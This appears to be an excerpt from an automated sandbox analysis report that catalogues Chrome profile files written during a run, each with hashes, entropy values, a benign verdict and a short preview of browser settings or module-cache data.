SSDEEP:	48:Yc1kKSChkSirbNqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzC:nVLR61pIKI95k0JCKL8nbOTlVuHn
MD5:	91B185C1006719F76197121E16706158
SHA1:	39E2BA8B661F1A4EF2DDE64FD9EF34B1A47762C5
SHA-256:	B8136336231CE45BA78EB4565923AB5D679C1173ECE217C5AF0740125A7FADBA
SHA-512:	C1ECA233CDE346D6B45DE87CC229E4F5CEE69C9CF9B1FBBC50850E1CF85B4182AF15DFDE837452CB1B46F2DD82D9E0D215D1CFD2D96EC5957973EFACDAE3366E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_rece

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000004.dbtmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Rv:1qIFJ
MD5:	6752A1D65B201C13B62EA44016EB221F
SHA1:	58ECF154D01A62233ED7FB494ACE3C3D4FFCE08B
SHA-256:	0861415CADA612EA5834D56E2CF1055D3E63979B69EB71D32AE9AE394D8306CD
SHA-512:	9CFD838D3FB570B44FC3461623AB2296123404C6C8F576B0DE0AABD9A6020840D4C9125EB679ED384170DBCAAC2FA30DC7FA9EE5B77D6DF7C344A0AA030E0389
Malicious:	false
Preview:	MANIFEST-000004.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\e698de8a-1c3b-45bb-9948-ed52f4c50d4a.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4899
Entropy (8bit):	4.935931533909383
Encrypted:	false
SSDEEP:	48:Yc1kKSChkliFqARiqTlYGlQKHoTw0jrf4MqM8C1Nfct/9BhUJo3KhmeSnpNGzFen:nVLK61pIKI95k0JCKL8bbOTlVuHn
MD5:	049739E195E83C219E1C7C39F7E074A4
SHA1:	A3C132A7398223DBD1D653C11F68877A3950A7BC
SHA-256:	DF8621B9883E4723107312D2697F69B5408347D9C9A386ED8914395AF165C8C2
SHA-512:	7AB1F16D98BFAC5E43975F13ED63FE86B30FD10583F7D8976F069989D3B6F2B7F025A49869831DDC799EC2ECC270AEF1C48FDD1BF7F431CEDCB11D6E5D60D76E
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13298721015354457","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245924509391818","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"bookmark_bar":{"show_on_all_tabs":false},"browser":{"default_browser_infobar_last_declined":"13245924607060180","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","2042016"],"daily_recei

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	106
Entropy (8bit):	3.138546519832722
Encrypted:	false
SSDEEP:	3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
MD5:	DE9EF0C5BCC012A3A1131988DEE272D8
SHA1:	FA9CCBDC969AC9E1474FCE773234B28D50951CD8
SHA-256:	3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
SHA-512:	CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.8150724101159437
Encrypted:	false
SSDEEP:	3:Yx7:4
MD5:	C422F72BA41F662A919ED0B70E5C3289
SHA1:	AAD27C14B27F56B6E7C744A8EC5B1A7D767D7632
SHA-256:	02E71EB4C587FEB7EE00CE8600F97411C2774C2FC34CB95B92D5538E7F30DA59
SHA-512:	86010ED2B2EEBDCC5A8A076B37703669C294C6D1BFAAEA963E26A9C94B81B4C53EC765D9425E5B616159C43923F800A891F9B903659575DF02F8845521F8DC46
Malicious:	false
Preview:	85.0.4183.121

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	199748
Entropy (8bit):	6.0448124575828155
Encrypted:	false
SSDEEP:	6144:q03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:VCW8D2FmvoL
MD5:	E60DFC6596AD4631983715C4A3CEE81B
SHA1:	C7B33855C3A64BE8D464586EAD7B146002C64043
SHA-256:	F52BB3FF9E9536A4BD26066BBB3E84D299D4FBFAED2A062A2B62128663F323B3
SHA-512:	D8AA2F3E04A2E573BCDD994A853EC358CE2ABC62D5A82513CA7926BAE64EF72228ECF95BA21FE6C73CAC43943C04DCA5D9B1C7411B9F3E812F996BE66628FE3E
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache (copy)

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	102096
Entropy (8bit):	3.750383296977358
Encrypted:	false
SSDEEP:	384:tDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmI3SI4srrT2mP7F30GGK1j:zy1pCkQhcerj5UklPzOmKgqy5f
MD5:	303A9BBE8192F3D77E6BFF8334626437
SHA1:	2D209B29B0606566E63B79E1769C3BD4D2A88C57
SHA-256:	0597B1BE36EC03645AC4E28BBCEACFB97A07C6C8EEBAD3E941687AB5E32C6DF9
SHA-512:	B793D1B664F5243FF375E4367D6098ADA0A0EA9C44518026C66D41D16AD7E9129970AA4DE342E1E19A6EF9C6FE0FEE53088995655D3087BBDA363770758AE321
Malicious:	false
Preview:	..................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Indexed Rules\27\scoped_dir5208_1786759565\Ruleset Data

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	150056
Entropy (8bit):	4.8588214550289095
Encrypted:	false
SSDEEP:	3072:P8C4uHgjBz+BZKEZZ3F0Sl03PzpDL7UI09QEwNyfe:P8C5go1U6IYeH
MD5:	C56FF16BF9B9FC0002C0128DD0BD763D
SHA1:	5048CFDBAC5D7AAAD345BAE08E66E8C4E803CA02
SHA-256:	404AA48D274C3A8FEC3145858E00279D01E0C37A5304218E191C0156E4DE00FF
SHA-512:	D993A324F5D9A1FC4FB3131252F48679750081D996295C994E2DCA4E84F2DECF7E90AF6766EFEDC2CEFC6B66194FFF38181C9E9CE45346BEEB8B3A09CE66BB73
Malicious:	false
Preview:	.........................[.................................. ...X...l...h...d...0.......X...T...P...L...H.......@...<.......4...0...,.......\|...`...D........... ................................'......ozama........*...'......g.bat........&...'......onwod.......`....'......ennab............'......nozam............(......geips.......P...((......rekoj...........@(......lgoog...........X(......uotpo........+..p(......lreko.......d...h(...............Y...............Y...Y..pY..TY..8Y...Y...Y...Y...Y...Y...Y...X...Y...Y...Y...Y...Y...X..\|Y..xY...X..pY..xX..hY..XX..`Y..\Y..4X..TY..PY..LY..HY..DY..@Y...X..8Y...W..0Y...W..(Y...W.. Y...Y...Y...Y...Y...Y...Y...Y...Y...X...X...X...X..PW..4W...X...X...X...X...W...X...X...X...X...V...X...V...V...X...X...X..xV...X...X...X...X...X...X...X...X...X..\|X..4V..tX..pX..lX..hX..dX...V...U..XX...U..PX..LX...U..DX..@X..<X..8X..xU..\U..@U..(X..$X.. X...X...X...X...U...X...X...X...X...T...T...T...T...W...W...W...W...W...W...W...W...W..LT...W...W...W...W.. T...W..

C:\Users\user\AppData\Local\Google\Chrome\User Data\a2ad74ca-9388-4264-854b-475f1f4c3227.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	199645
Entropy (8bit):	6.044540100232156
Encrypted:	false
SSDEEP:	6144:y03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:9CW8D2FmvoL
MD5:	DBBBDCB7A4EC0FD857BBAC7314921BAD
SHA1:	BA35AA951DC9EEFED613BE5555E4D5E0451859B8
SHA-256:	3E6DCBB0EB676F58C644DC7FD22AC795C6E6B4C313FDC00AF364612BC90F06A7
SHA-512:	81B3CFCA7B3A4876C876ACCF689ED67036E6F47DDDD42FF435010A1C9417717398413A1692B91DD0305E8C75BEA84FE1D56635C6A64ECFCB2B77B0FC86316F34
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\bab41e6d-e4c8-4eca-b536-aebebfdeb89b.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PGP symmetric key encrypted data - Plaintext or unencrypted data salted -
Category:	dropped
Size (bytes):	100752
Entropy (8bit):	3.7506088696232336
Encrypted:	false
SSDEEP:	384:kDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmASI4srrT2mP030GGK1Ow1:Qy1pCw1hcerj5UklPzOmKgqy5z
MD5:	DE3B2F0E95DB4520CED7533E1DF3B3DC
SHA1:	C5E7124A9CF7E9BBE71D30223544BED7ED025642
SHA-256:	F370FC4B142674F05F59A39BE797843E51FD969EF5242A5748861D79755B5F73
SHA-512:	0C4F3F311693932DFD3EB6E7558131582C680765360FA0C6F76FEDDFE9A55D79D28E4008681DC9F3D39D2B07EAAA2C571405EE830469188B7616E9F3CFB25C04
Malicious:	false
Preview:	...................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\c12f6f20-8069-49bd-9fce-f002e4790bab.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	99424
Entropy (8bit):	3.7503910359576045
Encrypted:	false
SSDEEP:	384:fDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmASI4srrT2mP030GGK1Owm:5y1pCw1hcer4UklPzOmKgqy5z
MD5:	C381B76739A18DFB606AEE7711A178FA
SHA1:	75E5D5174532912188B08A9280EFF4496107B86C
SHA-256:	F7319EB048339AF8D111A0640619F8F7997AD449FB0360FD4C60CD467AF3D71C
SHA-512:	247C674DC6D0F962F6317BD61045C1A0CBAAC0B5E24223E0BB9F920B6B36653C187F46EC601B8B3EE6A2B4951B6306C37B582027AD7294258C156B1FE0C4278D
Malicious:	false
Preview:	\..................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\d58fecef-1e86-45e9-a082-7f7bade77c38.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	102096
Entropy (8bit):	3.750383296977358
Encrypted:	false
SSDEEP:	384:tDN2icDtD2c7ClN+r7vSEr3Baw5HUtGFMrX7aFberxmI3SI4srrT2mP7F30GGK1j:zy1pCkQhcerj5UklPzOmKgqy5f
MD5:	303A9BBE8192F3D77E6BFF8334626437
SHA1:	2D209B29B0606566E63B79E1769C3BD4D2A88C57
SHA-256:	0597B1BE36EC03645AC4E28BBCEACFB97A07C6C8EEBAD3E941687AB5E32C6DF9
SHA-512:	B793D1B664F5243FF375E4367D6098ADA0A0EA9C44518026C66D41D16AD7E9129970AA4DE342E1E19A6EF9C6FE0FEE53088995655D3087BBDA363770758AE321
Malicious:	false
Preview:	..................C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6......M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....^8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.

C:\Users\user\AppData\Local\Google\Chrome\User Data\dae76324-67e3-4336-89a9-4163bb26c366.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	199748
Entropy (8bit):	6.0448124575828155
Encrypted:	false
SSDEEP:	6144:q03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:VCW8D2FmvoL
MD5:	E60DFC6596AD4631983715C4A3CEE81B
SHA1:	C7B33855C3A64BE8D464586EAD7B146002C64043
SHA-256:	F52BB3FF9E9536A4BD26066BBB3E84D299D4FBFAED2A062A2B62128663F323B3
SHA-512:	D8AA2F3E04A2E573BCDD994A853EC358CE2ABC62D5A82513CA7926BAE64EF72228ECF95BA21FE6C73CAC43943C04DCA5D9B1C7411B9F3E812F996BE66628FE3E
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\dc9b2ef3-856c-4f76-8861-fed0a9519e8d.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	199553
Entropy (8bit):	6.044287905636466
Encrypted:	false
SSDEEP:	6144:n03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:0CW8D2FmvoL
MD5:	2BEFEAD84AFABFAFFEFD89DDE1868438
SHA1:	38943C0029546993EE5D68E29AAA31EDBD191596
SHA-256:	00921474ABA2E1E15398462507CE765024331A1FDE159992A25670F188BBC7F9
SHA-512:	314A49169ECAFDCBEF4BD930B430BCB918A9DD91A24708A3ABE052264C4D0EDD11E23D5E7CC7B427719F3FA9A845E41063304BE5DCEF4B84B419D05BA14DA400
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13291206129529003"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Local\Google\Chrome\User Data\ef178d2b-96e6-4705-990d-3be3079274de.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	207994
Entropy (8bit):	6.072255443143038
Encrypted:	false
SSDEEP:	6144:9U03ytU8zTbOFF0D1XMQUaqfIlUOoSiuRs:9nCW8D2FmvoL
MD5:	188FEB3462080707EB1131D501863DBF
SHA1:	ADD3566B6EBC83074275CF0340CE3049DCE9C527
SHA-256:	4A408F2AF7FD48496B1A9F48756FA7162BC189E53DE98B7847A9E2A67D9B4F87
SHA-512:	178D666D6AAEE635F0F9E5A71565ABCA169C1643F63E1F5150FB639B42BE399DA1DAD0464F2AA1543BF3EA8B391B8BEE5D937D24C946B2CF847DA7398838E26E
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.654247416776041e+12,"network":1.654247418e+12,"ticks":114744137.0,"uncertainty":3928952.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ